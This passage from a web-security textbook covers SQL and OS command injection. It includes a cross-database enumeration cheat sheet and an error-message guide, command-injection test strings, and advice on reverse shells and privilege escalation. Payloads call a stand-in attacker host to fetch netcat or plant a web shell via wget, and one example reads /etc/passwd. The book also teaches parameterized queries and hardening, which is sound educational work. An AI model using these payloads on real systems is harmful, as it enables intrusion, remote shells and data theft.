Requirement: Cause a time delay

Oracle: Utl_Http.request('http://madeupserver.com')

MS-SQL: waitfor delay '0:0:10'

exec master..xp_cmdshell 'ping localhost'

MySQL: benchmark(50000,sha1('test'))

Requirement: Retrieve database version string

Oracle: select banner from v$version

MS-SQL: select @@version

MySQL: select @@version

Requirement: Retrieve current database

Oracle: SYS_CONTEXT('USERENV','DB_NAME')

MS-SQL: select db_name()

The server name can be retrieved using:

select @@servername

MySQL: Select database()


Requirement: Retrieve current user’s privilege

Oracle: select * from session_privs

MS-SQL: select grantee, table_name, privilege_type

from INFORMATION_SCHEMA.TABLE_PRIVILEGES

MySQL: SHOW GRANTS FOR CURRENT_USER()

Requirement: Show user objects

Oracle: Select object_name, object_type from user_objects

MS-SQL: SELECT * FROM sysobjects

MySQL: SELECT table_name, table_type FROM information_schema.tables

(MySQL 5.0 and later expose metadata through information_schema; earlier versions offer only SHOW statements.)

Requirement: Show user tables

Oracle: Select object_name, object_type from user_objects WHERE object_type='TABLE'

Or to show all tables to which the user has access:

SELECT table_name FROM all_tables

MS-SQL: SELECT * FROM sysobjects WHERE xtype='U'

MySQL: SHOW TABLES

On MySQL 5.0 and later: SELECT table_name FROM information_schema.tables WHERE table_schema = database()

Requirement: Show column names for table foo

Oracle: Select column_name, data_type from user_tab_columns where table_name = 'FOO'

Use the ALL_tab_columns table if the target data is not owned by the current application user.

MS-SQL: SELECT syscolumns.* FROM syscolumns JOIN sysobjects ON syscolumns.id=sysobjects.id WHERE sysobjects.name='FOO'

MySQL: show columns from foo

Requirement: Interact with the operating system (simplest ways)

Oracle: See The Oracle Hacker’s Handbook, by David Litchfield

MS-SQL: exec xp_cmdshell 'dir c:\'

MySQL: select load_file('/etc/passwd')


SQL Error Messages

Oracle: ORA-01756: quoted string not properly

terminated

ORA-00933: SQL command not properly ended

MS-SQL: Msg 170, Level 15, State 1, Line 1

Line 1: Incorrect syntax near ‘foo

Msg 105, Level 15, State 1, Line 1

Unclosed quotation mark before the character

string ‘foo

MySQL: You have an error in your SQL syntax. Check

the manual that corresponds to your MySQL

server version for the right syntax to use

near ‘’foo’ at line X

Translation: For Oracle and MS-SQL, SQL injection is present, and it is

almost certainly exploitable! If you entered a single quote and

it altered the syntax of the database query, this is the error

you’d expect.

For MySQL, SQL injection may well be present, but the same

error message can appear in other contexts.

Oracle: PLS-00306: wrong number or types of arguments

in call to ‘XXX’

MS-SQL: Procedure ‘XXX’ expects parameter ‘@YYY’,

which was not supplied

MySQL: N/A

Translation: You have commented out or removed a variable that would

normally be supplied to the database. In MS-SQL, you should

be able to use time delay enumeration to perform arbitrary

data retrieval.

Oracle: ORA-01789: query block has incorrect number of

result columns

MS-SQL: Msg 205, Level 16, State 1, Line 1

All queries in an SQL statement containing a

UNION operator must have an equal number of

expressions in their target lists.

MySQL: The used SELECT statements have a different

number of columns

Translation: You will see this when you are attempting a UNION SELECT attack, and you have specified a different number of columns from the number in the original SELECT statement.


Oracle: ORA-01790: expression must have same datatype

as corresponding expression

MS-SQL: Msg 245, Level 16, State 1, Line 1

Syntax error converting the varchar value

‘foo’ to a column of data type int.

MySQL: (MySQL will not give you an error.)

Translation: You will see this when you are attempting a UNION SELECT

attack, and you have specified a different data type from that

found in the original SELECT statement. Try using a NULL, or

using 1 or 2000.

Oracle: ORA-01722: invalid number

ORA-01858: a non-numeric character was found

where a numeric was expected

MS-SQL: Msg 245, Level 16, State 1, Line 1

Syntax error converting the varchar value

‘foo’ to a column of data type int.

MySQL: (MySQL will not give you an error.)

Translation: Your input doesn’t match the expected data type for the field.

You may have SQL Injection, and you may not need a single

quote, so try simply entering a number followed by your SQL

to be injected.

In MS-SQL, you should be able to return any string value with

this error message.

Oracle: ORA-00923: FROM keyword not found where

expected

MS-SQL: N/A

MySQL: N/A

Translation: The following will work in MS-SQL:

SELECT 1

But in Oracle, if you want to return something, you must

select from a table. The DUAL table will do fine:

SELECT 1 from DUAL

Oracle: ORA-00936: missing expression

MS-SQL: Msg 156, Level 15, State 1, Line 1

Incorrect syntax near the keyword ‘from’.


MySQL: You have an error in your SQL syntax. Check

the manual that corresponds to your MySQL

server version for the right syntax to use

near ‘ XXX , YYY from SOME_TABLE’ at line 1

Translation: You commonly see this error message when your injection

point occurs before the FROM keyword (for example, you have

injected into the columns to be returned) and/or you have

used the comment character to remove required SQL

keywords.

Try completing the SQL statement yourself while using your

comment character.

MySQL should helpfully reveal the column names XXX, YYY

when this condition is encountered.

Oracle: ORA-00972: identifier is too long

MS-SQL: String or binary data would be truncated.

MySQL: N/A

Translation: This does not indicate SQL injection. You may see this error

message if you have entered a long string. You’re not likely to

get a buffer overflow here either, as the database is handling

your input safely.

Oracle: ORA-00942: table or view does not exist

MS-SQL: Msg 208, Level 16, State 1, Line 1

Invalid object name ‘foo’

MySQL: Table ‘DBNAME.SOMETABLE’ doesn’t exist

Translation: Either you are trying to access a table or view that does not

exist, or in the case of Oracle, the database user does not

have privileges for the table or view. Test your query against a

table you know you have access to, such as DUAL.

MySQL should helpfully reveal the current database schema

DBNAME when this condition is encountered.

Oracle: ORA-00920: invalid relational operator

MS-SQL: Msg 170, Level 15, State 1, Line 1

Line 1: Incorrect syntax near foo

MySQL: You have an error in your SQL syntax. Check

the manual that corresponds to your MySQL

server version for the right syntax to use

near ‘’ at line 1

Translation: You were probably altering something in a WHERE clause, and

your SQL injection attempt has disrupted the grammar.


Oracle: ORA-00907: missing right parenthesis

MS-SQL: N/A

MySQL: You have an error in your SQL syntax. Check

the manual that corresponds to your MySQL

server version for the right syntax to use

near ‘’ at line 1

Translation: Your SQL injection attempt has worked, but the injection point

was inside parentheses ( ). You probably commented out the

closing parenthesis with injected comment characters --.

Oracle: ORA-00900: invalid SQL statement

MS-SQL: Msg 170, Level 15, State 1, Line 1

Line 1: Incorrect syntax near foo

MySQL: You have an error in your SQL syntax. Check

the manual that corresponds to your MySQL

server version for the right syntax to use

near XXXXXX

Translation: A general error message. The error messages listed previously

all take precedence, so something else went wrong. It’s likely

you can try alternative input and get a more meaningful

message.

Oracle: ORA-03001: unimplemented feature

MS-SQL: N/A

MySQL: N/A

Translation: You have tried to perform an action that Oracle does not

allow. This can happen if you were trying to display the

database version string from v$version but you were in an

UPDATE or INSERT query.

Oracle: ORA-02030: can only select from fixed

tables/views

MS-SQL: N/A

MySQL: N/A

Translation: You were probably trying to edit a SYSTEM view. This can happen if you were trying to display the database version string from v$version but you were in an UPDATE or INSERT query.
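The error messages in this reference also help to fingerprint the back-end database. The following Python sketch is illustrative only: the function name guess_database and the choice of patterns are assumptions made for this example, and the patterns cover just the most distinctive message formats listed above (ORA- and PLS- codes, the MS-SQL "Msg n, Level n, State n" prefix, and the MySQL syntax error preamble). Other MySQL messages in the table would not be recognized by it.

```python
import re

# Signature patterns drawn from the message formats in the table above.
_SIGNATURES = [
    ("Oracle", re.compile(r"\b(?:ORA|PLS)-\d{5}\b")),
    ("MS-SQL", re.compile(r"\bMsg \d+, Level \d+, State \d+")),
    ("MySQL", re.compile(r"You have an error in your SQL syntax")),
]


def guess_database(error_text):
    """Return the first database whose signature appears in the text, else None."""
    for name, pattern in _SIGNATURES:
        if pattern.search(error_text):
            return name
    return None


print(guess_database("ORA-01756: quoted string not properly terminated"))
print(guess_database("Msg 170, Level 15, State 1, Line 1"))
print(guess_database("You have an error in your SQL syntax. Check the manual"))
print(guess_database("HTTP 500 Internal Server Error"))
```

A match identifies only the likely platform; the Translation entries above are still needed to interpret what the error implies for your injection attempt.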


Preventing SQL Injection

Despite all of its different manifestations, and the complexities that can arise in its exploitation, SQL injection is in general one of the easier vulnerabilities to prevent. Nevertheless, discussion about SQL injection countermeasures is frequently misleading, and many people rely upon defensive measures that are only partially effective.

Partially Effective Measures

Because of the prominence of the single quotation mark in the standard explanations of SQL injection flaws, a common approach to preventing attacks is to escape any single quotation marks within user input by doubling them up. You have already seen two situations in which this approach fails:

■■

If numeric user-supplied data is being embedded into SQL queries, this

is not normally encapsulated within single quotation marks. Hence, an

attacker can break out of the data context and begin entering arbitrary

SQL, without the need to supply a single quotation mark.

■■

In second-order SQL injection attacks, data that has been safely escaped

when initially inserted into the database is subsequently read from the

database and then passed back to it again. Quotation marks that have

been doubled up initially will return to their original form when the

data is reused.
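The first of these failures can be seen in a minimal Python sketch. Everything here is hypothetical: the helper names, the emp table's empno column, and the query text are assumptions chosen for illustration, and no database is contacted. The sketch only shows the query strings that a quote-doubling defense would produce.

```python
def escape_quotes(value: str) -> str:
    """Double every single quote: the partially effective defense."""
    return value.replace("'", "''")


def build_string_query(name: str) -> str:
    # String context: the value sits inside quotes, so doubling contains it.
    return "SELECT ename, sal FROM emp WHERE ename = '" + escape_quotes(name) + "'"


def build_numeric_query(emp_id: str) -> str:
    # Numeric context: no surrounding quotes, so the attacker needs none either.
    return "SELECT ename, sal FROM emp WHERE empno = " + escape_quotes(emp_id)


string_query = build_string_query("x' OR 'a'='a")
numeric_query = build_numeric_query("1 OR 1=1")
print(string_query)
print(numeric_query)
```

In the string case the payload stays inside the quoted literal, but in the numeric case the injected OR 1=1 reaches the query unchanged because it contains no quotation marks to escape.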

Another countermeasure that is often cited is the use of stored procedures

for all database access. There is no doubt that custom stored procedures can

provide security and performance benefits; however, they are not guaranteed

to prevent SQL injection vulnerabilities, for two reasons:

■■

As you saw in the case of Oracle, a poorly written stored procedure can contain SQL injection vulnerabilities within its own code. Similar security issues arise when constructing SQL statements within stored procedures as do elsewhere, and the fact that a stored procedure is being used does not prevent flaws from arising.

■■

Even if a robust stored procedure is being used, SQL injection vulnerabilities can arise if it is invoked in an unsafe way using user-supplied input. For example, suppose that a user registration function is implemented within a stored procedure, which is invoked as follows:

exec sp_RegisterUser 'joe', 'secret'

This statement may be just as vulnerable as a simple INSERT statement.

For example, an attacker may supply the following password:

foo'; exec master..xp_cmdshell 'tftp wahh-attacker.com GET nc.exe'--


which causes the application to perform the following batch query:

exec sp_RegisterUser 'joe', 'foo'; exec master..xp_cmdshell 'tftp wahh-attacker.com GET nc.exe'--'

and so the use of the stored procedure has achieved nothing.

In fact, in a large and complex application that executes thousands of different SQL statements, many developers regard the solution of re-implementing these statements as stored procedures to be an unjustifiable overhead on development time.

Parameterized Queries

Most databases and application development platforms provide APIs for handling untrusted input in a secure way that prevents SQL injection vulnerabilities from arising. In parameterized queries (also known as prepared statements), the construction of a SQL statement containing user input is performed in two steps:

1. The application specifies the structure of the query, leaving placeholders for each item of user input.

2. The application specifies the contents of each placeholder.

Crucially, there is no way in which crafted data that is specified at the second step can interfere with the structure of the query specified in the first step. Because the query structure has already been defined, the relevant API handles any type of placeholder data in a safe manner, and so it is always interpreted as data rather than part of the statement’s structure.

The following two code samples illustrate the difference between an unsafe query dynamically constructed out of user data, and its safe parameterized counterpart. In the first, the user-supplied name parameter is embedded directly into a SQL statement, leaving the application vulnerable to SQL injection:

//define the query structure
String queryText = "select ename,sal from emp where ename ='";

//concatenate the user-supplied name
queryText += request.getParameter("name");
queryText += "'";

// execute the query
Statement stmt = con.createStatement();
ResultSet rs = stmt.executeQuery(queryText);


In the second example, the query structure is defined using a question mark as a placeholder for the user-supplied parameter. The prepareStatement method is invoked to interpret this, and fix the structure of the query that is to be executed. Only then is the setString method used to specify the actual value of the parameter. Because the query’s structure has already been fixed, this value can contain any data at all, without affecting the structure. The query is then executed safely:

//define the query structure
String queryText = "SELECT ename,sal FROM EMP WHERE ename = ?";

//prepare the statement through DB connection "con"
PreparedStatement stmt = con.prepareStatement(queryText);

//add the user input to variable 1 (at the first ? placeholder)
stmt.setString(1, request.getParameter("name"));

// execute the query
ResultSet rs = stmt.executeQuery();

NOTE The precise methods and syntax for creating parameterized queries

differ among databases and application development platforms. See Chapter 18

for more details about the most common examples.
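The same contrast can be reproduced end to end with a small runnable sketch. This one uses Python's standard sqlite3 module and an in-memory database purely as a stand-in; the sample rows and function names are assumptions for illustration, and the placeholder syntax of other databases and drivers may differ.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway in-memory emp table with two sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE emp (ename TEXT, sal INTEGER)")
    con.executemany("INSERT INTO emp VALUES (?, ?)",
                    [("SMITH", 800), ("KING", 5000)])
    return con


def lookup_unsafe(con, name):
    # User input is concatenated into the query text: injectable.
    query = "SELECT ename, sal FROM emp WHERE ename = '" + name + "'"
    return con.execute(query).fetchall()


def lookup_safe(con, name):
    # Query structure is fixed first; the value is bound to the ? placeholder.
    return con.execute(
        "SELECT ename, sal FROM emp WHERE ename = ?", (name,)
    ).fetchall()


con = make_db()
payload = "x' OR 'a'='a"
print(lookup_unsafe(con, payload))  # the injected OR clause matches every row
print(lookup_safe(con, payload))    # payload is treated as a literal name
print(lookup_safe(con, "KING"))
```

With the concatenated query the payload rewrites the WHERE clause and every row is returned, whereas the bound parameter is compared as an ordinary string and matches nothing.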

If parameterized queries are to be an effective solution against SQL injection, then there are three important provisos to bear in mind:

■■

They should be used for every database query. The authors have encountered many applications where the developers made a judgment in each case whether or not to use a parameterized query. In cases where user-supplied input was clearly being used, they did so; otherwise, they didn’t bother. This approach has been the cause of many SQL injection flaws. First, by focusing only on input that has been immediately received from the user, it is easy to overlook second-order attacks because data that has already been processed is assumed to be trusted. Second, it is easy to make mistakes about the specific cases in which the data being handled is user-controllable. In a large application, different items of data will be held within the session or received from the client. Assumptions made by one developer may not be communicated to others. The handling of specific data items may change in the future, introducing a SQL injection flaw into previously safe queries. It is much safer to take the approach of mandating the use of parameterized queries throughout the application.

■■

Every item of data inserted into the query should be properly parameterized. The authors have encountered numerous cases where most of a query’s parameters are handled safely; however, one or two items are concatenated directly into the string used to specify the query structure. The use of parameterized queries will not prevent SQL injection if some parameters are handled in this way.

■■

Parameter placeholders cannot be used to specify the table and column names used in the query. In some very rare cases, applications need to specify these items within an SQL query on the basis of user-supplied data. In this situation, the best approach is to use a white list of known good values (i.e., the list of tables and columns actually used within the database) and reject any input that does not match an item on this list. Failing this, strict validation should be enforced on the user input: for example, allowing only alphanumeric characters, excluding whitespace, and enforcing a suitable length limit.
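The third proviso can be sketched as follows. This is a minimal illustration rather than a complete defense: the white list contents, the function names, and the 30-character limit are all assumptions made for the example.

```python
import re

# Hypothetical white list: the only columns the application may sort by.
ALLOWED_SORT_COLUMNS = {"ename", "sal"}


def build_sorted_query(sort_column: str) -> str:
    """Accept a column name only if it appears on the white list."""
    if sort_column not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unexpected sort column")
    return "SELECT ename, sal FROM emp ORDER BY " + sort_column


def is_plausible_identifier(value: str) -> bool:
    """Fallback check: ASCII alphanumerics only, no whitespace, 1 to 30 characters."""
    return re.fullmatch(r"[A-Za-z0-9]{1,30}", value) is not None


print(build_sorted_query("sal"))
print(is_plausible_identifier("emp2"))
print(is_plausible_identifier("emp; DROP TABLE emp"))
```

The white list is the stronger check because it admits only names known to exist; the pattern check merely limits what an attacker can express.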

Defense in Depth

As always, a robust approach to security should employ defense-in-depth

measures to provide additional protection in the event that front-line defenses

fail for any reason. In the context of attacks against back-end databases, there

are three layers of further defense that can be employed:

■■

The application should use the lowest possible level of privileges when accessing the database. In general, the application does not need DBA-level permissions; it normally only needs to read and write its own data. In security-critical situations, the application may employ a different database account for performing different actions. For example, if 90% of its database queries only require read access, then these can be performed using an account which does not have write privileges. If a particular query only needs to read a subset of data (for example, the orders table, but not the user accounts table), then an account with the corresponding level of access can be used. If this approach is enforced throughout the application, then any residual SQL injection flaws that may exist are likely to have their impact significantly reduced.

■■

Many enterprise databases include a huge amount of default functionality that can be leveraged by an attacker who gains the ability to execute arbitrary SQL statements. Wherever possible, unnecessary functions should be removed or disabled. Even though there are cases where a skilled and determined attacker may be able to recreate some required functions through other means, this task is not usually straightforward, and the database hardening will still place significant obstacles in the way of the attacker.

■■

All vendor-issued security patches should be evaluated, tested, and applied in a timely way, to fix known vulnerabilities within the database software itself. In security-critical situations, database administrators can use various subscriber-based services to obtain advance notification of some known vulnerabilities that have not yet been patched by the vendor, and so can implement appropriate work-around measures in the interim.
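The first of these layers, using a read-only account for queries that only read, can be illustrated by analogy. The sketch below is an assumption-laden stand-in: SQLite has no user accounts, so a connection opened in read-only mode plays the role of the low-privileged account, and the file name and orders table are invented for the example.

```python
import os
import sqlite3
import tempfile

# Set up a small database file using a normal read-write connection.
path = os.path.join(tempfile.mkdtemp(), "app.db")
rw = sqlite3.connect(path)
rw.execute("CREATE TABLE orders (id INTEGER, item TEXT)")
rw.execute("INSERT INTO orders VALUES (1, 'widget')")
rw.commit()
rw.close()

# Reopen read-only: the stand-in for an account without write privileges.
ro = sqlite3.connect("file:" + path + "?mode=ro", uri=True)
rows = ro.execute("SELECT * FROM orders").fetchall()

try:
    # An injected write statement fails even if the query itself is flawed.
    ro.execute("DELETE FROM orders")
    write_blocked = False
except sqlite3.OperationalError:
    write_blocked = True

print(rows, write_blocked)
ro.close()
```

On an enterprise database the equivalent control would be a separate login granted only the privileges each group of queries needs.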

Injecting OS Commands

Most web server platforms have evolved to the point where built-in APIs exist to perform practically any required interaction with the server’s operating system. Properly used, these APIs can enable developers to access the file system, interface with other processes, and carry out network communications in a safe manner. Nevertheless, there are many situations where developers elect to use the more heavyweight technique of issuing operating system commands directly to the server. This option can be attractive because of its power and simplicity, and often provides an immediate and functional solution to a particular problem. However, if the application passes user-supplied input to operating system commands, then it may well be vulnerable to command injection, enabling an attacker to submit crafted input that modifies the commands that the developers intended to perform.

The functions commonly used to issue operating system commands, such as exec in PHP and wscript.shell in ASP, do not impose any restriction on the scope of commands that may be performed. Even if a developer intends to use an API to perform a relatively benign task such as listing a directory’s contents, an attacker may be able to subvert it to write arbitrary files or launch other programs. Any injected commands will normally run in the security context of the web server process, which will often be sufficiently powerful for an attacker to compromise the entire server.

Command injection flaws of this kind have arisen in numerous off-the-shelf

and custom-built web applications. They have been particularly prevalent

within applications that provide an administrative interface to an enterprise

server or to devices such as firewalls, printers, and routers. These applications

often have particular requirements for operating system interaction that lead

developers to use direct commands which incorporate user-supplied data.

Example 1: Injecting via Perl

Consider the following Perl CGI code, which is part of a web application for server administration. This function allows administrators to specify a directory on the server, and view a summary of its disk usage:

#!/usr/bin/perl
use strict;
use CGI qw(:standard escapeHTML);
print header, start_html("");
print "<pre>";
my $command = "du -h --exclude php* /var/www/html";
$command= $command.param("dir");
$command=`$command`;
print "$command\n";
print end_html;

When used as intended, this script simply appends the value of the user-supplied dir parameter to the end of a preset command, executes the command, and displays the results, as shown in Figure 9-3.

Figure 9-3: A simple application function for listing a directory’s contents

This functionality can be exploited in various ways, by supplying crafted input containing shell metacharacters. These characters have a special meaning to the interpreter that processes the command and can be used to interfere with the command that the developer intended to execute. For example, the pipe character | is used to redirect the output from one process into the input of another, enabling multiple commands to be chained together. An attacker can leverage this behavior to inject a second command and retrieve its output, as shown in Figure 9-4.


Figure 9-4: A successful command injection attack

Here, the output from the original du command has been redirected as the input to the command cat /etc/passwd. This command simply ignores the input and performs its sole task of outputting the contents of the passwd file.
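The mechanics of this attack can be reproduced harmlessly. The following Python sketch is an analogy to the Perl script, not a translation of it: it assumes a POSIX system with sh and echo available, uses echo as a stand-in for du, and the function names are invented for illustration. It contrasts handing a concatenated string to the shell with passing the input as a single argument.

```python
import subprocess


def run_like_backticks(user_dir: str) -> str:
    # Mirrors the Perl backticks: the whole string is parsed by the shell.
    command = "echo listing " + user_dir  # echo stands in for du
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


def run_without_shell(user_dir: str) -> str:
    # No shell involved: the input is one argument, metacharacters and all.
    result = subprocess.run(["echo", "listing", user_dir],
                            capture_output=True, text=True)
    return result.stdout


payload = "/tmp | echo INJECTED"
print(run_like_backticks(payload))
print(run_without_shell(payload))
```

In the first call the shell treats | as a pipe and runs the injected command, whose output replaces that of the intended one. In the second call the same characters are simply printed as data.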

An attack as simple as this may appear improbable; however, exactly this type of command injection has been found in numerous commercial products. For example, HP Openview was found to be vulnerable to a command injection flaw within the following URL:

https://target:3443/OvCgi/connectedNodes.ovpl?node=a| [your command] |

Example 2: Injecting via ASP

Consider the following ASP code, which is part of a web application for

administering a web server. The function allows administrators to view the

contents of a requested log file:

Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = "type c:\inetpub\wwwroot\logs\" & Request.Form("FileName")
szTempFile = "C:\" & oFileSys.GetTempName()
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)


When used as intended, this script inserts the value of the user-supplied FileName parameter into a preset command, executes the command, and displays the results, as shown in Figure 9-5.

Figure 9-5: A function to display the contents of a log file

As with the vulnerable Perl script, an attacker can use shell metacharacters to interfere with the preset command intended by the developer, and inject his own command. The ampersand character (&) is used to batch multiple commands together. Supplying a filename containing the ampersand character and a second command causes this command to be executed and its results displayed, as shown in Figure 9-6.

Figure 9-6: A successful command injection attack


Finding OS Command Injection Flaws

In your application mapping exercises (see Chapter 4), you should already have identified any instances where the web application appears to be interacting with the underlying operating system, by calling out to external processes or accessing the file system. You should probe all of these functions looking for command injection flaws. In fact, however, the application may issue operating system commands containing absolutely any item of user-supplied data, including every URL and body parameter and every cookie. To perform a thorough test of the application, you therefore need to target all these items within every application function.

Different command interpreters handle shell metacharacters in different ways. In principle, any type of application development platform or web server may call out to any kind of shell interpreter, running either on its own operating system or that of any other host. You should not therefore make any assumptions about the application’s handling of metacharacters based on any knowledge of the web server’s operating system.

There are two broad types of metacharacter that may be used to inject a separate command into an existing preset command:

■■

The characters ; | & and newline may be used to batch multiple commands together, one after the other. In some cases, these characters may be doubled up with different effects. For example, in the Windows command interpreter, using && will cause the second command to run only if the first is successful. Using || will cause the second command to run only if the first fails, whereas a single & runs the second command regardless of the outcome of the first.

■■

The backtick character (`) can be used to encapsulate a separate command within a data item being processed by the original command, as in the example given at the beginning of this chapter. Placing an injected command within backticks will cause the shell interpreter to execute the command and replace the encapsulated text with the results of this command, before continuing to execute the resulting command string.
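The behavior of these metacharacters is easy to confirm on a test system. The sketch below assumes a POSIX shell reachable as sh, so it says nothing directly about the Windows command interpreter, although the doubled operators && and || follow the same success and failure rules there. The helper name sh is an assumption for this example, and false and true are the standard utilities that always fail and always succeed.

```python
import subprocess


def sh(command: str) -> str:
    """Run a command line through the POSIX shell and return its trimmed stdout."""
    completed = subprocess.run(["sh", "-c", command],
                               capture_output=True, text=True)
    return completed.stdout.strip()


# && runs the second command only when the first succeeds.
print(repr(sh("false && echo ran")))
# || runs the second command only when the first fails.
print(repr(sh("false || echo ran")))
print(repr(sh("true || echo ran")))
# ; runs the second command regardless of the first.
print(repr(sh("false ; echo ran")))
# Backticks are replaced by the output of the enclosed command.
print(repr(sh("echo `echo inner`")))
```

Knowing which separator runs unconditionally matters when the preset command may fail or succeed depending on your input.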

In the previous examples, it was straightforward to verify that command injection was possible, and to retrieve the results of the injected command, because those results were returned immediately within the application’s response. In many cases, however, this may not be possible. You may be injecting into a command that returns no results and which does not affect the application’s subsequent processing in any identifiable way. Or the method you have used to inject your chosen command may be such that its results are lost as multiple commands are batched together.

The most reliable way in general to detect whether command injection is possible is to use time-delay inference, in a similar way to that described for exploiting blind SQL injection. If a potential vulnerability appears to exist, you can then use other methods to confirm this and to retrieve the results of your injected commands.


HACK STEPS

■ You can normally use the ping command as a means of triggering a time

delay, by causing the server to ping its loopback interface for a specific

period. There are minor differences between the way Windows and Unix-

based platforms handle command separators and the ping command,

but the following all-purpose test string should induce a 30-second time

delay on either platform if no filtering is in place:

|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &

To maximize your chances of detecting a command injection flaw if the

application is filtering certain command separators, you should also submit

each of the following test strings to each targeted parameter in turn, and

monitor the time taken for the application to respond:

| ping -i 30 127.0.0.1 |
| ping -n 30 127.0.0.1 |
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
; ping 127.0.0.1 ;
%0a ping -i 30 127.0.0.1 %0a

` ping 127.0.0.1 `

■ If a time delay occurs, then the application may be vulnerable to com-

mand injection. Repeat the test case several times to confirm that the

delay was not the result of network latency or other anomalies. You can

try changing the value of the -n or -i parameters, and confirming that

the delay experienced varies systematically with the value supplied.

■ Using whichever of the injection strings was found to be successful, try

injecting a more interesting command (such as ls or dir), and deter-

mine whether you are able to retrieve the results of the command back

to your browser.

■ If you are unable to retrieve results directly, there are other options open

to you:

  ■ You can attempt to open an out-of-band channel back to your computer. Try using TFTP to copy tools up to the server, using telnet or netcat to create a reverse shell back to your computer, and using the mail command to send command output via SMTP.

  ■ You can redirect the results of your commands to a file within the web root, which you can then retrieve directly using your browser. For example:

dir > c:\inetpub\wwwroot\foo.txt


■ Once you have found a means of injecting commands and retrieving the

results, you should determine your privilege level (by using whoami or

something similar, or attempting to write a harmless file to a protected

directory). You may then seek to escalate privileges, gain backdoor

access to sensitive application data, or attack other hosts reachable from

the compromised server.
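The timing checks in the steps above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: it supposes you have already recorded response times (in seconds) yourself, and the function name delay_tracks_parameter and the jitter allowance of two seconds are hypothetical choices, not part of any tool described in this chapter.

```python
from statistics import median


def delay_tracks_parameter(baseline, samples, jitter=2.0):
    """Return True if the observed delay grows with the injected value.

    baseline: response times (seconds) for ordinary requests.
    samples:  dict mapping the value supplied to -n or -i to a list of
              response times (seconds) measured with that value.
    jitter:   assumed allowance (seconds) for normal network variation.
    """
    normal = median(baseline)
    # Extra delay for each injected value, in ascending order of value.
    extras = [median(samples[value]) - normal for value in sorted(samples)]
    if len(extras) < 2:
        return False  # need at least two values to see a trend
    clearly_delayed = all(extra > jitter for extra in extras)
    increasing = all(b - a > jitter for a, b in zip(extras, extras[1:]))
    return clearly_delayed and increasing
```

Using the median of several measurements per value reflects the advice to repeat each test case, so that a single slow response caused by network latency does not produce a false positive.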

In some cases, it may not be possible to inject an entirely separate command,

due to filtering of required characters, or the behavior of the command API

being used by the application. Nevertheless, it may still be possible to interfere

with the behavior of the command being performed, to achieve some desired

result.

HACK STEPS

■ The < and > characters are used respectively to direct the contents of a

file to the command’s input and to direct the command’s output to a file.

If it is not possible to use the preceding techniques to inject an entirely

separate command, you may still be able to read and write arbitrary file

contents using the < and > characters.

■ Many operating system commands which applications invoke accept a

number of command-line parameters that control their behavior. Often,

user-supplied input is passed to the command as one of these parame-

ters, and you may be able to add further parameters simply by inserting a

space followed by the relevant parameter. For example, a web authoring

application may contain a function in which the server retrieves a user-

specified URL and renders its contents in-browser for editing. If the

application simply calls out to the wget program, then you may be able

to write arbitrary file contents to the server’s file system by appending

the -O command-line parameter used by wget. For example:

url=http://wahh-attacker.com/%20-O%20c:\inetpub\wwwroot\scripts\cmdasp.asp

TIP Many command injection attacks require you to inject spaces to separate

command-line arguments. If you find that spaces are being filtered by the

application, and the platform you are attacking is Unix-based, you may be able

to use the $IFS environment variable instead, which contains the whitespace

field separators.


Preventing OS Command Injection

In general, the best way to prevent OS command injection flaws from arising is to avoid calling out directly to operating system commands at all. Virtually any conceivable task that a web application may need to carry out can be achieved using built-in APIs that cannot be manipulated to perform commands other than the one intended.

If it is considered unavoidable to embed user-supplied data into command

strings that are passed to an operating system command interpreter, the appli-

cation should enforce rigorous defenses to prevent a vulnerability arising. If

possible, a white list should be used to restrict user input to a specific set of

expected values. Alternatively, the input should be restricted to a very narrow character set (for example, alphanumeric characters only). Input containing any other data, including any conceivable metacharacter or whitespace, should be rejected.

As a further layer of protection, the application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters and if properly used can ensure that only the command intended by the developer will be executed. See Chapter 18 for more details of command execution APIs.
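The two defenses just described can be combined as in the following sketch. It is written in Python rather than Java or ASP.NET, so it is an analogy and not the APIs named above: the subprocess module, given an argument list, launches the process directly without a shell. The function names and the use of sys.executable as a stand-in for the real program are assumptions made for illustration.

```python
import re
import subprocess
import sys

# Narrow character set: alphanumeric characters only.
ALLOWED = re.compile(r"[A-Za-z0-9]+")


def validate(value):
    """Reject any input that is not purely alphanumeric."""
    if not ALLOWED.fullmatch(value):
        raise ValueError("input contains disallowed characters")
    return value


def run_with_argument(value):
    """Launch one specific process, passing the input as a single argument.

    The argument list is handed to the operating system without a shell,
    so characters such as ; | & and backticks have no special meaning.
    sys.executable is only a placeholder for the program being invoked.
    """
    argument = validate(value)
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", argument],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.strip()
```

Validation alone or the shell-free API alone would each stop the test strings shown earlier. Using both means that a mistake in one layer does not immediately expose the application.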

Injecting into Web Scripting Languages

The core logic of most web applications is written in interpreted scripting lan-

guages like PHP, VBScript, and Perl. In addition to the possibilities for inject-

ing into languages used by other back-end components, a key area of

vulnerability concerns injection into the core application code itself. Exposure

to this type of attack arises from two main sources:

■■ Dynamic execution of code that incorporates user-supplied data.

■■ Dynamic inclusion of code files specified on the basis of user-supplied data.

We will look at each of these vulnerabilities in turn.

Dynamic Execution Vulnerabilities

Many web scripting languages support the dynamic execution of code that is

generated at runtime. This feature enables developers to create applications

that dynamically modify their own code in response to various data and con-

ditions. If user input is incorporated into code that is dynamically executed,

then an attacker may be able to supply crafted input that breaks out of the

intended data context and specifies commands that are executed on the server

in the same way as if they had been written by the original developer. Because

most scripting languages contain powerful APIs that may be used to access the

underlying operating system, code injection into the web application often

leads to a compromise of the entire server.

Dynamic Execution in PHP

The PHP function eval is used to dynamically execute code that is passed to the

function at runtime. Consider a search function that enables users to create stored

